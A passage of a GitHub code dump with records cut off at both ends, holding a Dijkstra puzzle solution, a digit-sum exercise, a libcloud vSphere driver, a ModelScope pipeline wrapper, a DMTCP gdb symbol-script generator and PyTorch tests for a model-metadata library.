g2)\r\n\r\n\r\n","repo_name":"78Moonlight78/dm_computer_algebra","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":21503,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21860311998","text":"import sys\r\nimport heapq\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\ngraph = defaultdict(list)\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\n# 최단거리를 이루는 간선 그래프\r\npath_graph = defaultdict(list)\r\npath_graph[1] = [1]\r\n\r\n# 다익스트라 수행\r\ndistance_list = [float('inf')] * (n+1)\r\n\r\n# 1번부터 시작\r\ndistance_list[1] = 0\r\n\r\n# 현재 위치에서 가장 가까운 거리, 노드 번호, 경로 리스트\r\nheap = [(0, 1, [1])]\r\n\r\nwhile heap:\r\n dist, node, path = heapq.heappop(heap)\r\n \r\n if dist > distance_list[node]:\r\n continue\r\n \r\n for adj_node, adj_dist in graph[node]:\r\n new_dist = dist + adj_dist\r\n \r\n if new_dist < distance_list[adj_node]:\r\n distance_list[adj_node] = new_dist\r\n new_path = path + [adj_node]\r\n \r\n path_graph[adj_node] = new_path\r\n \r\n heapq.heappush(heap, (new_dist, adj_node, new_path))\r\n \r\npath_to_recover = set()\r\n\r\n# 모든 정점까지 최단 거리를 이루는 간선 탐색하여 복구할 회선을 찾음\r\nfor key in path_graph.keys():\r\n if key == 1:\r\n continue\r\n \r\n # 최단거리를 이루는 간선 모음\r\n shortest_path = path_graph[key]\r\n for i in range(len(shortest_path)-1):\r\n path_to_recover.add((shortest_path[i], shortest_path[i+1]))\r\n \r\nprint(len(path_to_recover))\r\n\r\nfor path in path_to_recover:\r\n print(path[0], path[1])","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/2211. 네트워크 복구/네트워크 복구.py","file_name":"네트워크 복구.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8994112035","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"Apenas valores positivos devem ser informados!\")\n else:\n soma = 0\n aux = number\n while(aux != 0):\n soma = soma + (aux % 10)\n aux = aux // 10\n print(f\"A soma dos algarismo de {number} é {soma}.\")\n\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao11.py","file_name":"Questao11.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33493469953","text":"import os\nimport sys\nimport atexit\n\ntry:\n import pysphere\n pysphere\nexcept ImportError:\n raise ImportError('Missing \"pysphere\" dependency. You can install it '\n 'using pip - pip install pysphere')\n\nfrom pysphere import VIServer\nfrom pysphere.vi_task import VITask\nfrom pysphere.vi_mor import VIMor, MORTypes\nfrom pysphere.resources import VimService_services as VI\nfrom pysphere.vi_virtual_machine import VIVirtualMachine\n\nfrom libcloud.utils.decorators import wrap_non_libcloud_exceptions\nfrom libcloud.common.base import ConnectionUserAndKey\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.common.types import InvalidCredsError\nfrom libcloud.compute.base import NodeDriver\nfrom libcloud.compute.base import NodeLocation\nfrom libcloud.compute.base import NodeImage\nfrom libcloud.compute.base import Node\nfrom libcloud.compute.types import NodeState, Provider\nfrom libcloud.utils.networking import is_public_subnet\n\n__all__ = [\n 'VSphereNodeDriver',\n 'VSphere_5_5_NodeDriver'\n]\n\nDEFAULT_API_VERSION = '5.5'\nDEFAULT_CONNECTION_TIMEOUT = 5 # default connection timeout in seconds\n\n\nclass VSphereConnection(ConnectionUserAndKey):\n def __init__(self, user_id, key, secure=True,\n host=None, port=None, url=None, timeout=None):\n if host and url:\n raise ValueError('host and url arguments are mutually exclusive')\n\n if host:\n host_or_url = host\n elif url:\n host_or_url = url\n else:\n raise ValueError('Either \"host\" or \"url\" argument must be '\n 'provided')\n\n self.host_or_url = host_or_url\n self.client = None\n super(VSphereConnection, self).__init__(user_id=user_id,\n key=key, secure=secure,\n host=host, port=port,\n url=url, timeout=timeout)\n\n def connect(self):\n self.client = VIServer()\n\n trace_file = os.environ.get('LIBCLOUD_DEBUG', None)\n\n try:\n self.client.connect(host=self.host_or_url, user=self.user_id,\n password=self.key,\n sock_timeout=DEFAULT_CONNECTION_TIMEOUT,\n trace_file=trace_file)\n except Exception:\n e = sys.exc_info()[1]\n message = e.message\n fault = getattr(e, 'fault', None)\n\n if fault == 'InvalidLoginFault':\n raise InvalidCredsError(message)\n\n raise LibcloudError(value=message, driver=self.driver)\n\n atexit.register(self.disconnect)\n\n def disconnect(self):\n if not self.client:\n return\n\n try:\n self.client.disconnect()\n except Exception:\n # Ignore all the disconnect errors\n pass\n\n def run_client_method(self, method_name, **method_kwargs):\n method = getattr(self.client, method_name, None)\n return method(**method_kwargs)\n\n\nclass VSphereNodeDriver(NodeDriver):\n name = 'VMware vSphere'\n website = 'http://www.vmware.com/products/vsphere/'\n type = Provider.VSPHERE\n connectionCls = VSphereConnection\n\n NODE_STATE_MAP = {\n 'POWERED ON': NodeState.RUNNING,\n 'POWERED OFF': NodeState.STOPPED,\n 'SUSPENDED': NodeState.SUSPENDED,\n 'POWERING ON': NodeState.PENDING,\n 'POWERING OFF': NodeState.PENDING,\n 'SUSPENDING': NodeState.PENDING,\n 'RESETTING': NodeState.PENDING,\n 'BLOCKED ON MSG': NodeState.ERROR,\n 'REVERTING TO SNAPSHOT': NodeState.PENDING\n }\n\n def __new__(cls, username, password, secure=True, host=None, port=None,\n url=None, api_version=DEFAULT_API_VERSION, **kwargs):\n if cls is VSphereNodeDriver:\n if api_version == '5.5':\n cls = VSphere_5_5_NodeDriver\n else:\n raise NotImplementedError('Unsupported API version: %s' %\n (api_version))\n return super(VSphereNodeDriver, cls).__new__(cls)\n\n def __init__(self, username, password, secure=True,\n host=None, port=None, url=None, timeout=None):\n self.url = url\n super(VSphereNodeDriver, self).__init__(key=username, secret=password,\n secure=secure, host=host,\n port=port, url=url)\n\n @wrap_non_libcloud_exceptions\n def list_locations(self):\n \"\"\"\n List available locations.\n\n In vSphere case, a location represents a datacenter.\n \"\"\"\n datacenters = self.connection.client.get_datacenters()\n\n locations = []\n for id, name in datacenters.items():\n location = NodeLocation(id=id, name=name, country=None,\n driver=self)\n locations.append(location)\n\n return locations\n\n @wrap_non_libcloud_exceptions\n def list_images(self):\n \"\"\"\n List available images (templates).\n \"\"\"\n server = self.connection.client\n\n names = ['name', 'config.uuid', 'config.template']\n properties = server._retrieve_properties_traversal(\n property_names=names,\n from_node=None,\n obj_type=MORTypes.VirtualMachine)\n\n images = []\n for prop in properties:\n id = None\n name = None\n is_template = False\n\n for item in prop.PropSet:\n if item.Name == 'config.uuid':\n id = item.Val\n if item.Name == 'name':\n name = item.Val\n elif item.Name == 'config.template':\n is_template = item.Val\n\n if is_template:\n image = NodeImage(id=id, name=name, driver=self)\n images.append(image)\n\n return images\n\n @wrap_non_libcloud_exceptions\n def list_nodes(self):\n vm_paths = self.connection.client.get_registered_vms()\n nodes = self._to_nodes(vm_paths=vm_paths)\n\n return nodes\n\n @wrap_non_libcloud_exceptions\n @wrap_non_libcloud_exceptions\n def ex_clone_node(self, node, name, power_on=True, template=False):\n \"\"\"\n Clone the provided node.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param name: Name of the new node.\n :type name: ``str``\n\n :param power_on: Power the new node on after being created.\n :type power_on: ``bool``\n\n :param template: Specifies whether or not the new virtual machine\n should be marked as a template.\n :type template: ``bool``\n\n :return: New node.\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n new_vm = vm.clone(name=name, power_on=power_on, template=template)\n new_node = self._to_node(vm=new_vm)\n\n return new_node\n\n @wrap_non_libcloud_exceptions\n def ex_migrate_node(self, node, resource_pool=None, host=None,\n priority='default'):\n \"\"\"\n Migrate provided node to a new host or resource pool.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param resource_pool: ID of the target resource pool to migrate the\n node into.\n :type resource_pool: ``str``\n\n :param host: Target host to migrate the host to.\n :type host: ``str``\n\n :param priority: Migration task priority. Possible values: default,\n high, low.\n :type priority: ``str``\n\n :return: True on success.\n :rtype: ``bool``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n vm.migrate(priority=priority, resource_pool=resource_pool, host=host)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def reboot_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.reset()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def destroy_node(self, node, ex_remove_files=True):\n \"\"\"\n :param ex_remove_files: Remove all the files from the datastore.\n :type ex_remove_files: ``bool``\n \"\"\"\n ex_remove_files = False\n vm = self._get_vm_for_node(node=node)\n\n server = self.connection.client\n\n # Based on code from\n # https://pypi.python.org/pypi/pyxenter\n if ex_remove_files:\n request = VI.Destroy_TaskRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.Destroy_Task(request)._returnval\n task = VITask(ret, server)\n\n # Wait for the task to finish\n status = task.wait_for_state([task.STATE_SUCCESS,\n task.STATE_ERROR])\n\n if status == task.STATE_ERROR:\n raise LibcloudError('Error destroying node: %s' %\n (task.get_error_message()))\n else:\n request = VI.UnregisterVMRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.UnregisterVM(request)\n task = VITask(ret, server)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_stop_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_off()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_start_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_on()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_suspend_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.suspend()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pools(self):\n \"\"\"\n Return all the available resource pools.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_resource_pools()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pool_name(self, node):\n \"\"\"\n Retrieve resource pool name for the provided node.\n\n :rtype: ``str``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n return vm.get_resource_pool_name()\n\n @wrap_non_libcloud_exceptions\n def ex_get_hosts(self):\n \"\"\"\n Return all the available hosts.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_hosts()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_datastores(self):\n \"\"\"\n Return all the available datastores.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_datastores()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_node_by_path(self, path):\n \"\"\"\n Retrieve Node object for a VM with a provided path.\n\n :type path: ``str``\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self.connection.client.get_vm_by_path(path)\n node = self._to_node(vm=vm)\n return node\n\n def ex_get_node_by_uuid(self, uuid):\n \"\"\"\n Retrieve Node object for a VM with a provided uuid.\n\n :type uuid: ``str``\n \"\"\"\n vm = self._get_vm_for_uuid(uuid=uuid)\n node = self._to_node(vm=vm)\n return node\n\n @wrap_non_libcloud_exceptions\n def ex_get_server_type(self):\n \"\"\"\n Return VMware installation type.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_server_type()\n\n @wrap_non_libcloud_exceptions\n def ex_get_api_version(self):\n \"\"\"\n Return API version of the vmware provider.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_api_version()\n\n def _get_vm_for_uuid(self, uuid, datacenter=None):\n \"\"\"\n Retrieve VM for the provided UUID.\n\n :type uuid: ``str``\n \"\"\"\n server = self.connection.client\n\n dc_list = []\n if datacenter and VIMor.is_mor(datacenter):\n dc_list.append(datacenter)\n else:\n dc = server.get_datacenters()\n if datacenter:\n dc_list = [k for k, v in dc.iteritems() if v == datacenter]\n else:\n dc_list = list(dc.iterkeys())\n\n for mor_dc in dc_list:\n request = VI.FindByUuidRequestMsg()\n search_index = server._do_service_content.SearchIndex\n mor_search_index = request.new__this(search_index)\n mor_search_index.set_attribute_type(MORTypes.SearchIndex)\n request.set_element__this(mor_search_index)\n\n mor_datacenter = request.new_datacenter(mor_dc)\n mor_datacenter.set_attribute_type(MORTypes.Datacenter)\n request.set_element_datacenter(mor_datacenter)\n\n request.set_element_vmSearch(True)\n request.set_element_uuid(uuid)\n\n try:\n vm = server._proxy.FindByUuid(request)._returnval\n except VI.ZSI.FaultException:\n pass\n else:\n if vm:\n return VIVirtualMachine(server, vm)\n\n return None\n\n def _to_nodes(self, vm_paths):\n nodes = []\n for vm_path in vm_paths:\n vm = self.connection.client.get_vm_by_path(vm_path)\n node = self._to_node(vm=vm)\n nodes.append(node)\n\n return nodes\n\n def _to_node(self, vm):\n assert(isinstance(vm, VIVirtualMachine))\n\n properties = vm.get_properties()\n status = vm.get_status()\n\n uuid = vm.properties.config.uuid\n instance_uuid = vm.properties.config.instanceUuid\n\n id = uuid\n name = properties['name']\n public_ips = []\n private_ips = []\n\n state = self.NODE_STATE_MAP.get(status, NodeState.UNKNOWN)\n ip_address = properties.get('ip_address', None)\n net = properties.get('net', [])\n resource_pool_id = str(vm.properties.resourcePool._obj)\n\n try:\n operating_system = vm.properties.summary.guest.guestFullName,\n except Exception:\n operating_system = 'unknown'\n\n extra = {\n 'uuid': uuid,\n 'instance_uuid': instance_uuid,\n 'path': properties['path'],\n 'resource_pool_id': resource_pool_id,\n 'hostname': properties.get('hostname', None),\n 'guest_id': properties['guest_id'],\n 'devices': properties.get('devices', {}),\n 'disks': properties.get('disks', []),\n 'net': net,\n\n 'overall_status': vm.properties.overallStatus,\n 'operating_system': operating_system,\n\n 'cpus': vm.properties.config.hardware.numCPU,\n 'memory_mb': vm.properties.config.hardware.memoryMB\n }\n\n # Add primary IP\n if ip_address:\n if is_public_subnet(ip_address):\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Add other IP addresses\n for nic in net:\n ip_addresses = nic['ip_addresses']\n for ip_address in ip_addresses:\n try:\n is_public = is_public_subnet(ip_address)\n except Exception:\n # TODO: Better support for IPv6\n is_public = False\n\n if is_public:\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Remove duplicate IPs\n public_ips = list(set(public_ips))\n private_ips = list(set(private_ips))\n\n node = Node(id=id, name=name, state=state, public_ips=public_ips,\n private_ips=private_ips, driver=self, extra=extra)\n return node\n\n def _get_vm_for_node(self, node):\n uuid = node.id\n vm = self._get_vm_for_uuid(uuid=uuid)\n return vm\n\n def _ex_connection_class_kwargs(self):\n kwargs = {\n 'url': self.url\n }\n\n return kwargs\n\n\nclass VSphere_5_5_NodeDriver(VSphereNodeDriver):\n name = 'VMware vSphere v5.5'\n","repo_name":"Psiphon-Inc/psiphon-automation","sub_path":"Automation/libcloud/libcloud/compute/drivers/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"}
+{"seq_id":"22863633488","text":"import os\nfrom typing import Any, Dict, Generator, List, Union\n\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.utils.constant import Hubs\nfrom modelscope.utils.device import create_device\nfrom modelscope.utils.hub import snapshot_download\n\n\nclass DiffusersPipeline(Pipeline):\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a diffusers pipeline\n Args:\n model: model id on modelscope hub or local dir.\n device: str = 'gpu'\n \"\"\"\n\n self.device_name = device\n self.cfg = None\n self.preprocessor = None\n self.framework = None\n self.device = create_device(self.device_name)\n self.hubs = kwargs.get('hubs', Hubs.modelscope)\n\n # make sure we download the model from modelscope hub\n model_folder = model\n if not os.path.isdir(model_folder):\n if self.hubs != Hubs.modelscope:\n raise NotImplementedError(\n 'Only support model retrieval from ModelScope hub for now.'\n )\n model_folder = snapshot_download(model)\n\n self.model = model_folder\n self.models = [self.model]\n self.has_multiple_models = len(self.models) > 1\n\n def preprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def __call__(self, input: Union[Input, List[Input]], *args,\n **kwargs) -> Union[Dict[str, Any], Generator]:\n preprocess_params, forward_params, postprocess_params = self._sanitize_parameters(\n **kwargs)\n self._check_input(input)\n out = self.preprocess(input, **preprocess_params)\n out = self.forward(out, **forward_params)\n out = self.postprocess(out, **postprocess_params)\n self._check_output(out)\n return out\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/diffusers_wrapped/diffusers_pipeline.py","file_name":"diffusers_pipeline.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"71017102729","text":"#!/usr/bin/env python\n\n# Usage: python THIS_FILE PID > GDB_SCRIPT\n# OR: THIS_FILE PID > GDB_SCRIPT\n# Invoke this on a running process, prior to checkpoint.\n# This creates a GDB_SCRIPT file that can restore the debugging\n# information during restart. On restart, do:\n# (gdb) source GDB_SCRIPT\n\nimport sys\nimport subprocess\nimport re\nimport os\n\ndef is_executable(filename):\n # 16 bytes for ELF magic number; then 2 bytes (short) for ELF type\n header = open(filename, \"rb\")\n elf_magic_number = header.read(16)\n elf_type = header.read(2)\n # Is it little-endian or big-endian\n elf_type = elf_type[0] if sys.byteorder == \"little\" else elf_type[1]\n # Handle both Python2.7 and Python3: type 2 is executable; type 3 is .so file\n elf_type = elf_type if isinstance(elf_type, int) else ord(elf_type)\n return elf_type == 2\n\n# FROM: https://stackoverflow.com/questions/33049201/gdb-add-symbol-file-all-sections-and-load-address\ndef relocatesections(filename):\n p = subprocess.Popen([\"readelf\", \"-S\", filename], stdout = subprocess.PIPE)\n sections = []\n textaddr = '0'\n for line in p.stdout.readlines():\n line = line.decode(\"utf-8\").strip()\n if not line.startswith('['):\n continue\n if line.startswith('[ 0]') or line.startswith('[Nr]'):\n continue\n line = line.replace(\"[ \", \"[\", 1)\n\n fieldsvalue = line.split()\n fieldsname = ['number', 'name', 'type', 'addr', 'offset', 'size',\n 'entsize', 'flags', 'link', 'info', 'addralign']\n sec = dict(zip(fieldsname, fieldsvalue))\n if not sec['name'].startswith(\".\"):\n continue\n if \".note\" in sec['name']:\n continue\n sections.append(sec)\n if sec['name'] == '.text':\n textaddr = sec['addr']\n return (textaddr, sections)\n\n\ndef writeSymbolFileToScript(filename_substring):\n (filename, base_addr) = memory_region(filename_substring)\n if is_executable(filename):\n base_addr = 0 # ELF executables already hard-wired absolute address\n (textaddr, sections) = relocatesections(filename)\n cmd = \"add-symbol-file %s 0x%x\" % (filename, int(textaddr, 16) + base_addr)\n for s in sections:\n addr = int(s['addr'], 16)\n if s['name'] == '.text' or addr == 0:\n continue\n cmd += \" -s %s 0x%x\" % (s['name'], addr + base_addr)\n print(cmd + \"\\n\")\n\n\ndef saveSymbolFilesToGdbScript():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s PID > gdb_script_file\\n\" % sys.argv[0])\n sys.exit(1)\n procmaps_file = \"/proc/\" + getpid() + \"/maps\"\n if (not os.path.isfile(procmaps_file)):\n sys.stderr.write(\"No such file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n if (not os.access(procmaps_file, os.R_OK)):\n sys.stderr.write(\"No read permission on file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n\n print(\"# GDB script; Either 'gdb -x THIS_FILE' or: (gdb) source THIS_FILE\\n\")\n for (filename, _) in memory_regions():\n writeSymbolFileToScript(filename)\n\n# Helper functions for writeSymbolFileToScript\ndef getpid():\n return sys.argv[1]\n\n# This returns a pair: (FILENAME_OR_LIBNAME, ADDRESS)\ndef procmap_filename_address(line):\n return (\"/\"+line.split(\" /\")[-1], int(\"0x\"+line.split(\"-\")[0], 16))\ndef memory_regions():\n p = subprocess.Popen([\"cat\", \"/proc/\"+getpid()+\"/maps\"],\n stdout = subprocess.PIPE)\n procmap_lines = [line.decode(\"utf-8\").strip()\n for line in p.stdout.readlines()]\n return [procmap_filename_address(memory) for memory in procmap_lines\n if \" /\" in memory and \"r-x\" in memory]\n\ndef memory_region(filename_substring):\n regions = memory_regions()\n return [region for region in regions if filename_substring in region[0]][0]\n\nsaveSymbolFilesToGdbScript()\n","repo_name":"dmtcp/dmtcp","sub_path":"util/save-symbol-files-to-gdb-script.py","file_name":"save-symbol-files-to-gdb-script.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"16"}
+{"seq_id":"34343327028","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris, load_boston\nimport pandas as pd\nimport numpy as np\n\nfrom ai_metadata import ModelSerialization, MiningFunction, MetadataModel\n\nseed = 123456\ntest_size = 0.33\n\n\ndef get_classifier():\n import torch.nn as nn # PyTorch's module wrapper\n\n class Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.h_layer = nn.Linear(4, 3)\n self.s_layer = nn.Softmax()\n\n def forward(self, x):\n y = self.h_layer(x)\n p = self.s_layer(y)\n return p\n\n return Classifier()\n\n\ndef get_net():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n import torch.nn.functional as F\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n return Net()\n\n\ndef test_classification():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n from torch.autograd import Variable # PyTorch's implementer of gradient descent and back\n\n X, y = load_iris(return_X_y=True)\n Y = pd.get_dummies(y).values\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n X_train_v = Variable(torch.FloatTensor(X_train), requires_grad=False)\n y_train_v = Variable(torch.FloatTensor(y_train), requires_grad=False)\n X_test_v = Variable(torch.FloatTensor(X_test), requires_grad=False)\n y_test_v = Variable(torch.FloatTensor(y_test), requires_grad=False)\n\n classifier = get_classifier() # declaring the classifier to an object\n loss_fn = nn.BCELoss() # calculates the loss\n optim = torch.optim.SGD(classifier.parameters(), lr=0.01)\n\n for num in range(100): # 100 iterations\n pred = classifier(X_train_v) # predict\n loss = loss_fn(pred, y_train_v) # calculate loss\n optim.zero_grad() # zero gradients to not accumulate\n loss.backward() # update weights based on loss\n optim.step() # update optimiser for next iteration\n\n model = MetadataModel.wrap(classifier,\n x_test=X_test,\n y_test=y_test,\n source_object=get_classifier)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 5.7,\n 4.4,\n 1.5,\n 0.4\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 4\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": [\n 1,\n 0,\n 0\n ],\n \"type\": \"uint8\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float32\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_classifier'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-cls')\n\n\ndef test_regression():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n\n X, y = load_boston(return_X_y=True)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n torch.set_default_dtype(torch.float64)\n\n dim = X.shape[1]\n net = nn.Sequential(\n nn.Linear(dim, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.Sigmoid(),\n nn.Linear(50, 1)\n )\n criterion = nn.MSELoss()\n opt = torch.optim.Adam(net.parameters(), lr=.0005)\n y_train_t = torch.from_numpy(y_train).clone().reshape(-1, 1)\n x_train_t = torch.from_numpy(X_train).clone()\n\n losssave = []\n stepsave = []\n\n for i in range(100):\n y_hat = net(x_train_t)\n loss = criterion(y_train_t, net(x_train_t))\n losssave.append(loss.item())\n stepsave.append(i)\n loss.backward()\n opt.step()\n opt.zero_grad()\n y_hat_class = (y_hat.detach().numpy())\n accuracy = np.sum(y_train.reshape(-1, 1) == y_hat_class) / len(y_train)\n if i > 0 and i % 100 == 0:\n print('Epoch %d, loss = %g acc = %g ' % (i, loss, accuracy))\n\n model = MetadataModel.wrap(net,\n x_test=X_test,\n y_test=y_test)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 22.5971,\n 0.0,\n 18.1,\n 0.0,\n 0.7,\n 5.0,\n 89.5,\n 1.5184,\n 24.0,\n 666.0,\n 20.2,\n 396.9,\n 31.99\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 13\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7.4,\n \"type\": \"float64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 1\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.REGRESSION\n assert model.save_model('./pytorch-reg')\n\n\ndef test_mnist():\n import torch\n import torch.optim as optim\n from torchvision import datasets, transforms\n from torch.optim.lr_scheduler import StepLR\n\n use_cuda = torch.cuda.is_available()\n batch_size = 64\n lr = 1.0\n gamma = 0.7\n epochs = 1\n\n torch.manual_seed(seed)\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'batch_size': batch_size}\n if use_cuda:\n kwargs.update({'num_workers': 1,\n 'pin_memory': True,\n 'shuffle': True},\n )\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n dataset1 = datasets.MNIST('./data', train=True, download=True, transform=transform)\n dataset2 = datasets.MNIST('./data', train=False, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset1, **kwargs)\n test_loader = torch.utils.data.DataLoader(dataset2, **kwargs)\n\n net = get_net().to(device)\n optimizer = optim.Adadelta(net.parameters(), lr=lr)\n\n scheduler = StepLR(optimizer, step_size=1, gamma=gamma)\n\n for epoch in range(1, epochs + 1):\n run_train(net, device, train_loader, optimizer)\n run_test(net, device, test_loader)\n scheduler.step()\n\n examples = enumerate(test_loader)\n batch_idx, (x_test, y_test) = next(examples)\n\n model = MetadataModel.wrap(net,\n x_test=x_test,\n y_test=y_test,\n source_object=get_net)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'][0]['shape'] == [None, 1, 28, 28]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7,\n \"type\": \"int64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 10\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_net'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-mnist')\n\n\ndef run_train(model, device, train_loader, optimizer):\n import torch.nn.functional as F\n\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n\ndef run_test(model, device, test_loader):\n import torch\n import torch.nn.functional as F\n\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch 